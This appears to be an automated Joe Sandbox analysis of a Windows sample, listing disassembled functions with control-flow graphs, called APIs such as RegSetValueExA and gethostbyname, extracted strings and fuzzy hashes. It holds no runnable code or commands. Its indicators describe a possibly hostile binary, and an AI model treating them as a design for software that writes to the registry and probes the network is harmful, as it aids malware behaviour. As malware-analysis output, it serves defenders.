                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 605 402a72-402a74 606 402a76-402a7b 605->606 607 402a9a-402a9e 605->607 608 40325e-40326b 606->608 609 4086d4-4086f9 call 4041b2 607->609 610 402aa4-402aa6 607->610 612 403271-40329d call 4027b0 call 403fc0 608->612 613 40150e-40e34a call 40a710 608->613 622 408700-40873a 609->622 623 4086fb 609->623 610->609 613->608 625 408764-408825 _strlen 622->625 626 40873c-40875e _strlen 622->626 627 40883f-40884c call 469914 623->627 629 408827-408830 RegSetValueExA 625->629 632 408835-408839 626->632 629->632 632->627
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8.8.8.8,114.114.114.114$N$S$a$e$e$e$m$r$r$v
                                                                                  • API String ID: 0-1623589704
                                                                                  • Opcode ID: aaf2cb7604d55b992d57f96f378ebd8cccee3257966581598af2bf552d503187
                                                                                  • Instruction ID: ad76d50b47f46615d966b73d0b2cfb7c7371a30b1c06df112acadf4a47ff12ef
                                                                                  • Opcode Fuzzy Hash: aaf2cb7604d55b992d57f96f378ebd8cccee3257966581598af2bf552d503187
                                                                                  • Instruction Fuzzy Hash: 494137708082D8D9EB16D664C9497DDBFB45F16348F4440CDD5843A2C2C7FE1B99CB66
                                                                                  Function 00433150 Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 489COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 633 433150-433188 call 404390 636 43318f-433193 633->636 637 433195-43319b 636->637 638 43319d-4331a0 636->638 639 4331a3-4331bf _memset 637->639 638->639 640 4331ca-4331d0 639->640 641 4331d2-4331dd 640->641 642 4331df-433213 call 469d0b call 469cd7 _rand 640->642 641->640 648 43321e-433224 642->648 649 433247-43324d 648->649 650 433226-433230 648->650 653 433254-43325a 649->653 654 43324f 649->654 651 433232 650->651 652 433239-433241 650->652 651->652 655 433243 652->655 656 433245 652->656 657 433273-4332d1 _memset call 46b090 _strlen 653->657 658 43325c-433260 653->658 659 4338d3-4338d7 654->659 655->649 656->648 670 4332d3-4332da 657->670 671 4332f0-433367 call 46b0a0 _memset * 2 call 433940 657->671 664 433262-43326c 658->664 665 43326e 658->665 661 4338fa-433912 call 404700 659->661 662 4338d9-4338dd 659->662 676 433929-433936 call 469914 661->676 662->661 666 4338df-4338ed _strlen 662->666 664->657 667 4338c6-4338cd 665->667 666->661 672 4338ef-43391b 666->672 667->642 667->659 670->671 675 4332dc-4332ed call 46b0a0 670->675 687 433369 671->687 688 43336e-433376 call 45087e 671->688 672->636 679 433921-433924 call 404700 672->679 675->671 679->676 687->667 691 43337d-43338d call 450925 688->691 694 433393-43339e call 438160 691->694 695 4334bb-4334c6 call 432ed0 691->695 698 4333a3-4333ab 694->698 699 4334cb-4334de 695->699 700 4333be-4333d8 call 4043f0 698->700 701 4333ad-4333b4 698->701 702 4334e0 699->702 703 4334ea-433504 call 4043f0 699->703 712 4333e9-4333fe 700->712 705 4338b1-4338b8 701->705 707 4338be-4338c1 call 450a5b 702->707 711 433515-43352a 703->711 705->691 705->707 707->667 713 433530-433537 711->713 714 4335d7-4335dd call 404700 711->714 715 433404-43340b 712->715 716 4334ab-4334b6 call 404700 712->716 718 433544 call 44a5b1 713->718 719 433539-433542 713->719 723 4335e2-4335f6 714->723 721 433418 call 44a5b1 715->721 722 43340d-433416 715->722 716->723 725 433549-43359a call 4068a0 718->725 719->718 719->725 728 43341d-43346e call 4068a0 721->728 722->721 722->728 730 433607-43361c 723->730 742 4335a8-4335b5 _strlen 725->742 743 43359c-4335a6 725->743 736 433470-43347a 728->736 737 43347c-433489 _strlen 728->737 733 433622-433629 730->733 734 433731-433746 730->734 740 433636 call 44a5b1 733->740 741 43362b-433634 733->741 738 433761-433779 734->738 739 433748-43374c 734->739 746 43348f-4334a6 call 4068a0 736->746 737->746 748 433791-43379f 738->748 749 43377b-43378b 738->749 744 43374e-433755 739->744 745 43375c 739->745 747 43363b-433689 call 433a40 740->747 741->740 741->747 751 4335bb-4335d2 call 4068a0 742->751 743->751 744->705 745->707 746->712 771 4336c1-4336c7 call 435f60 747->771 772 43368b-43369b call 435d10 747->772 753 4337a1-4337a5 748->753 754 4337d8-4337dc 748->754 749->748 751->711 758 4337a7-4337ca call 436660 753->758 759 4337d6 753->759 761 433815-433819 754->761 762 4337de-4337e2 754->762 758->759 785 4337cc 758->785 767 433846-43384d 759->767 761->767 768 43381b-43381f 761->768 764 433813 762->764 765 4337e4-4337e8 762->765 764->767 765->764 773 4337ea-433807 call 4366a0 765->773 777 433864-433868 767->777 778 43384f-433853 767->778 768->767 775 433821-43383a call 436730 768->775 783 4336cc-4336d1 771->783 795 4336af-4336ba call 433c30 772->795 796 43369d-4336a8 call 433c30 772->796 773->764 800 433809 773->800 775->767 803 43383c 775->803 780 43386a-43388a call 450a5b call 404700 777->780 781 43388f-4338af call 450a5b call 404700 777->781 786 433860 778->786 787 433855-43385c 778->787 780->676 781->676 792 4336d3-43370d call 436400 call 433c30 783->792 793 433711-43371c call 433c30 783->793 785->759 786->707 787->705 792->734 793->734 795->730 796->734 800->764 803->767
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_strlen$_rand
                                                                                  • String ID: 8tH$8tH$P
                                                                                  • API String ID: 1639540046-556088726
                                                                                  • Opcode ID: 12b65c612d7ec3cb8c476f6808ec05737540f83b829bd8fd3f25c69714e0270a
                                                                                  • Instruction ID: 1ebf0cffd5504f169992344da7b79c86c68b895f91d5a2556885a10078c10331
                                                                                  • Opcode Fuzzy Hash: 12b65c612d7ec3cb8c476f6808ec05737540f83b829bd8fd3f25c69714e0270a
                                                                                  • Instruction Fuzzy Hash: B42257B0D00218DBDB28DF55D881BEEB7B5BF4830AF1091AAE40967280DB795F85CF59
                                                                                  Function 00408090 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 320COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_malloc_strlen
                                                                                  • String ID: vc8
                                                                                  • API String ID: 2291048262-3387903242
                                                                                  • Opcode ID: 4a29b3c7692388b082ac17715db8972c7626a5228ea364a209282d20b576d689
                                                                                  • Instruction ID: 059be9408a10db197b09ab8385bdd689cc510c9f1f5dbe5d3152da61865c8b34
                                                                                  • Opcode Fuzzy Hash: 4a29b3c7692388b082ac17715db8972c7626a5228ea364a209282d20b576d689
                                                                                  • Instruction Fuzzy Hash: 22E11CF1D001189BDB14DB55DD81BEEB778AB54308F0041AEE60977282EB396F88CF5A
                                                                                  Function 6A6D24F0 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 311COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1051 6a6d24f0-6a6d284d call 6a6d2410 * 37 1126 6a6d284f-6a6d2865 call 6a6d2410 1051->1126 1127 6a6d2868-6a6d28ef call 6a6d2410 * 3 call 6a7019b0 call 6a6fde00 call 6a6fe0d8 1051->1127 1126->1127 1142 6a6d28f1-6a6d290f OutputDebugStringA * 2 call 6a6fe1a2 1127->1142 1143 6a6d2912-6a6d292a call 6a6fdb7c 1127->1143 1142->1143 1148 6a6d292c-6a6d2942 call 6a7019b0 1143->1148 1149 6a6d299e-6a6d29b5 call 6a6fd7eb 1143->1149 1148->1149 1154 6a6d2944 1148->1154 1155 6a6d2948-6a6d2952 1154->1155 1156 6a6d299a-6a6d299c 1155->1156 1157 6a6d2954-6a6d2996 call 6a6fde00 1155->1157 1156->1149 1156->1155 1157->1156
                                                                                  APIs
                                                                                    • Part of subcall function 6A6D2410: _strncpy.LIBCMT ref: 6A6D246F
                                                                                    • Part of subcall function 6A6D2410: _memset.LIBCMT ref: 6A6D2485
                                                                                    • Part of subcall function 6A6D2410: _sprintf.LIBCMT ref: 6A6D249F
                                                                                  • _memset.LIBCMT ref: 6A6D28BE
                                                                                  • _sprintf.LIBCMT ref: 6A6D28CE
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D28E2
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D28FC
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2903
                                                                                  • _malloc.LIBCMT ref: 6A6D291E
                                                                                  • _memset.LIBCMT ref: 6A6D2930
                                                                                  • _sprintf.LIBCMT ref: 6A6D295F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_sprintf$DebugOutputString$__wfopen_s_malloc_strncpy
                                                                                  • String ID: C:\pl.txt$current i : %d$total dlq type count : %d
                                                                                  • API String ID: 376268990-2168033949
                                                                                  • Opcode ID: 09fec2591aec6aee3aead2857e2844dc7dd98c78105f4b6e04361782dfd293ca
                                                                                  • Instruction ID: 1846db266f6be575ddef24c4f4a2354300b160b59d825258a1016a4486d01e4d
                                                                                  • Opcode Fuzzy Hash: 09fec2591aec6aee3aead2857e2844dc7dd98c78105f4b6e04361782dfd293ca
                                                                                  • Instruction Fuzzy Hash: E0A1953078430027F3066660CDA6F5A358A9B86B4CF059478EF452F3D3CE9A7E68439B
                                                                                  Function 6A6D2010 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D204A
                                                                                  • OutputDebugStringA.KERNEL32(6A71B120), ref: 6A6D205E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2065
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2080
                                                                                  • OutputDebugStringA.KERNEL32(6A71B130), ref: 6A6D2094
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D209B
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D20B9
                                                                                  • OutputDebugStringA.KERNEL32(out), ref: 6A6D20CD
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D20D4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s
                                                                                  • String ID: C:\pl.txt$out
                                                                                  • API String ID: 4089825709-3113491540
                                                                                  • Opcode ID: 1fc4a73d5d1d7302abc9dc1563f70cccfd79c7b290b9d68c64cb42856f5ecb63
                                                                                  • Instruction ID: 0761f59e90b7a12da5da4bce6e4e6027af3e9dac8691c304d16f4ec5170039b4
                                                                                  • Opcode Fuzzy Hash: 1fc4a73d5d1d7302abc9dc1563f70cccfd79c7b290b9d68c64cb42856f5ecb63
                                                                                  • Instruction Fuzzy Hash: 5A118172808200A7E710EBA1CC48B5B7BF5BBD5254F0A0869F61043251EF75EA4CDB93
                                                                                  Function 6A6F4780 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1187 6a6f4780-6a6f47c5 call 6a6f3911 GetModuleFileNameA 1190 6a6f47cb call 6a6f512c 1187->1190 1191 6a6f47c7-6a6f47c9 1187->1191 1192 6a6f47d0-6a6f47e5 PathFindExtensionA 1190->1192 1191->1190 1191->1192 1194 6a6f47ec-6a6f480b call 6a6f4740 1192->1194 1195 6a6f47e7 call 6a6f512c 1192->1195 1199 6a6f480d call 6a6f512c 1194->1199 1200 6a6f4812-6a6f4816 1194->1200 1195->1194 1199->1200 1202 6a6f4818-6a6f482a call 6a701a9e 1200->1202 1203 6a6f4831-6a6f4836 1200->1203 1202->1203 1216 6a6f482c call 6a6ee1fa 1202->1216 1204 6a6f486b-6a6f4872 1203->1204 1205 6a6f4838-6a6f4849 call 6a6f1709 1203->1205 1208 6a6f48bf-6a6f48c3 1204->1208 1209 6a6f4874-6a6f4881 1204->1209 1211 6a6f484e-6a6f4850 1205->1211 1212 6a6f48f7-6a6f4905 call 6a6fd7eb 1208->1212 1213 6a6f48c5-6a6f48f1 call 6a701a2a call 6a6e5770 call 6a701a9e 1208->1213 1214 6a6f488a 1209->1214 1215 6a6f4883-6a6f4888 1209->1215 1217 6a6f485b 1211->1217 1218 6a6f4852-6a6f4859 1211->1218 1213->1212 1213->1216 1221 6a6f488f-6a6f48b0 call 6a6ef2f0 call 6a701a9e 1214->1221 1215->1221 1216->1203 1223 6a6f485e-6a6f4869 call 6a701a9e 1217->1223 1218->1223 1221->1216 1235 6a6f48b6-6a6f48bc 1221->1235 1223->1204 1223->1216 1235->1208
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                                                  • String ID: .CHM$.HLP$.INI
                                                                                  • API String ID: 1153805871-4017452060
                                                                                  • Opcode ID: 49c5fd6ec3bcdc034c4f15487cecc783fb22369b21e965955324da13ca568843
                                                                                  • Instruction ID: b2ac61e6381d2d11dd1d22411da25095f8caed681d081766d18e25c4a86bf1c6
                                                                                  • Opcode Fuzzy Hash: 49c5fd6ec3bcdc034c4f15487cecc783fb22369b21e965955324da13ca568843
                                                                                  • Instruction Fuzzy Hash: 4F4180B09043199BDB11DBB5CE48B9AB7FDAF05308F010CA9E565D3541EFB4EA85CA60
                                                                                  Function 6A6DB9C0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 61networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup__strlwrgethostname
                                                                                  • String ID: D$S$a$e$f$j$s
                                                                                  • API String ID: 3543222892-4186746316
                                                                                  • Opcode ID: 67eeb77a1adf249b73b56470c66b74b5eb4b1cd0800d5418f079310fe3cdeaaa
                                                                                  • Instruction ID: 0abbb77e4ba768782e3414a2fa55f5017c914e71a427ac5e905b19fb27f1aec6
                                                                                  • Opcode Fuzzy Hash: 67eeb77a1adf249b73b56470c66b74b5eb4b1cd0800d5418f079310fe3cdeaaa
                                                                                  • Instruction Fuzzy Hash: 4621607060D7C08FF332962884147DB7FD5DF97348F0809ADE4D98B296DAB5490987A3
                                                                                  Function 6A6E3CFE Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 136networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 6A6E3D05
                                                                                    • Part of subcall function 6A6FF945: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,6A6E3D0A,00000000), ref: 6A6FF950
                                                                                    • Part of subcall function 6A6FF945: __aulldiv.LIBCMT ref: 6A6FF970
                                                                                    • Part of subcall function 6A6FE2FD: __getptd.LIBCMT ref: 6A6FE302
                                                                                  • _rand.LIBCMT ref: 6A6E3D16
                                                                                    • Part of subcall function 6A6FE30F: __getptd.LIBCMT ref: 6A6FE30F
                                                                                  • _memset.LIBCMT ref: 6A6E3D6A
                                                                                  • _memset.LIBCMT ref: 6A6E3E0D
                                                                                  • _memset.LIBCMT ref: 6A6E3E2A
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 6A6E3EA5
                                                                                  • gethostbyname.WS2_32(?), ref: 6A6E3EB3
                                                                                  • WSACleanup.WS2_32 ref: 6A6E3EBF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$Time__getptd$CleanupFileStartupSystem__aulldiv__time64_randgethostbyname
                                                                                  • String ID: P
                                                                                  • API String ID: 266322686-3110715001
                                                                                  • Opcode ID: 297790b9cc0053aac901e128e69812af1d1bd2c43839950379c97bd165f77280
                                                                                  • Instruction ID: 013a92dc77be323d34180b7f9ea8892f807ce2653d020e9ab67b5aac4615422b
                                                                                  • Opcode Fuzzy Hash: 297790b9cc0053aac901e128e69812af1d1bd2c43839950379c97bd165f77280
                                                                                  • Instruction Fuzzy Hash: F341057150C3814FC320DB6488687DBF7E6BF85308F040A2CD5E98B261EF719949CB96
                                                                                  Function 0040B650 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040B668
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  • _memset.LIBCMT ref: 0040B684
                                                                                  • _memset.LIBCMT ref: 0040B6A1
                                                                                    • Part of subcall function 0040B300: WSAStartup.WS2_32(?,00000202,?), ref: 0040B358
                                                                                    • Part of subcall function 0040B300: __strlwr.LIBCMT ref: 0040B383
                                                                                  • _memset.LIBCMT ref: 0040B6CD
                                                                                  • _sprintf.LIBCMT ref: 0040B6EC
                                                                                  • _memset.LIBCMT ref: 0040B709
                                                                                  • _strlen.LIBCMT ref: 0040B718
                                                                                  • _strlen.LIBCMT ref: 0040B73E
                                                                                  • _strlen.LIBCMT ref: 0040B7A0
                                                                                  • _strlen.LIBCMT ref: 0040B7E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strlen$AllocateHeapStartup__strlwr_malloc_sprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2943933030-0
                                                                                  • Opcode ID: bb7c92183f73e93e1e0b99a04dd8e420066ab204d0cd2ed13fa1b1b89432a466
                                                                                  • Instruction ID: cecee5c96da7dab0f3bfa9a154fa828a75071c79e98df934ec0d6b0860ad3a49
                                                                                  • Opcode Fuzzy Hash: bb7c92183f73e93e1e0b99a04dd8e420066ab204d0cd2ed13fa1b1b89432a466
                                                                                  • Instruction Fuzzy Hash: 9041CAF6C1021C57D725D7609C42BDD737CAF18704F4404DEE60966282FAB89B88CF96
                                                                                  Function 0040B480 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_memset$Startup__strlwr
                                                                                  • String ID: Baidunetdisk
                                                                                  • API String ID: 782317163-1556622174
                                                                                  • Opcode ID: 57f04d90f6c048a00ab0aa0256503761e3a33445b6a59398c0eb9b1f5af2436a
                                                                                  • Instruction ID: e319d31cd32d0f052158049bddd069a31f68f7e686cffcc5e2449e8c598c2fdc
                                                                                  • Opcode Fuzzy Hash: 57f04d90f6c048a00ab0aa0256503761e3a33445b6a59398c0eb9b1f5af2436a
                                                                                  • Instruction Fuzzy Hash: BE41F8B1C0429897CB22D7209C85BDD7B7C5F19308F4400DDF44966283E6B99B8CCFA6
